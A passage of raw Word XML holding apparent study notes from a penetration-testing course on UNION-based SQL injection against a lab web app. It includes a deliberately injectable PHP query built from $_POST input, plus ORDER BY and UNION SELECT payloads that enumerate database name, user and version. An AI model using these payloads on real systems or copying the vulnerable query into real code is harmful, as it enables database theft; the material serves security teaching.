                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4529138" cy="55888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B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! We managed to predictably fetch hashed admin credentials via the error-based SQL injection vulnerability we discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fnd2dwy2tebp" w:id="187"/>
      <w:bookmarkEnd w:id="187"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based SQL Injection Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (10.2.2. UNION-based Payloads)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Whenever we're dealing with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in-band (opposite of blind SQL injection) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injections and the result of the query is displayed along with the application-returned value, we should also test for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL injections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:hyperlink r:id="rId450">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId451">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">UNION</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword aids exploitation because it enables the execution of an extra SELECT statement and provides the results in the same query, thus concatenating two queries into one statement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLi attacks to work, we first need to satisfy two conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The injected </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> query has to include the same number of columns as the original query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The data types need to be compatible between each column.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To demonstrate this concept, let's test a web application with the following preconfigured SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$query = "SELECT * from customers WHERE name LIKE '".$_POST["search_input"]."%'";</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The query fetches all the records from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">customers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table. It also includes the</w:t>
      </w:r>
      <w:hyperlink r:id="rId452">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId453">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LIKE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword to search any </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> values containing our input that are followed by zero or any number of characters, as specified by the percentage (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) operator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can interact with the vulnerable application by browsing to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.16/search.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from our Kali machine. Once the page is loaded, we can click </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SEARCH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to retrieve all data from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">customers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3556000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 9: Loading the Customer Search Portal" id="142" name="image177.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 9: Loading the Customer Search Portal" id="0" name="image177.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId454"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3556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C2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before crafting any attack strategy, we need to know the exact number of columns present in the target table. Although the above output shows that four columns are present, we should not assume based on the application layout, as there may be extra columns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To discover the correct number of columns, we can submit the following injected query into the search bar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 1-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 2-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 3-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get an error at 6, then that means it has 5 columns. This is because it gives an error once you go above the number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The above statement orders the results by a specific column, meaning it will fail whenever the selected column does not exist. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1562100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 10: Finding the Exact Number of Columns" id="482" name="image469.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 10: Finding the Exact Number of Columns" id="0" name="image469.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId455"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1562100"/>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16CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1262"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Increasing the column value by one each time, we'll discover that the table has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">five columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since ordering by column </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">six returns </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">an error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we know there are five columns in the original SQL query, the next step is to determine which columns are displayed using the following query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' UNION SELECT 'a1', 'a2', 'a3', 'a4', 'a5' -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The result of the above query is displayed in the following image, which better visualizes the table's columns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4748213" cy="2069322"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 11: Displaying the Exact Number of Columns" id="214" name="image232.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 11: Displaying the Exact Number of Columns" id="0" name="image232.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId456"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4748213" cy="2069322"/>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16D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this information in mind, we can attempt our first attack by enumerating the current database name, user, and MySQL version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' UNION SELECT database(), user(), @@version, null, null -- //</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1463"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Side note: You will see that usually the first column is reserved for ID field, so you will most likely have to put null in the first column and move all your fields one to the right, as this writeup will explain below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we want to retrieve all the data from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">customers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
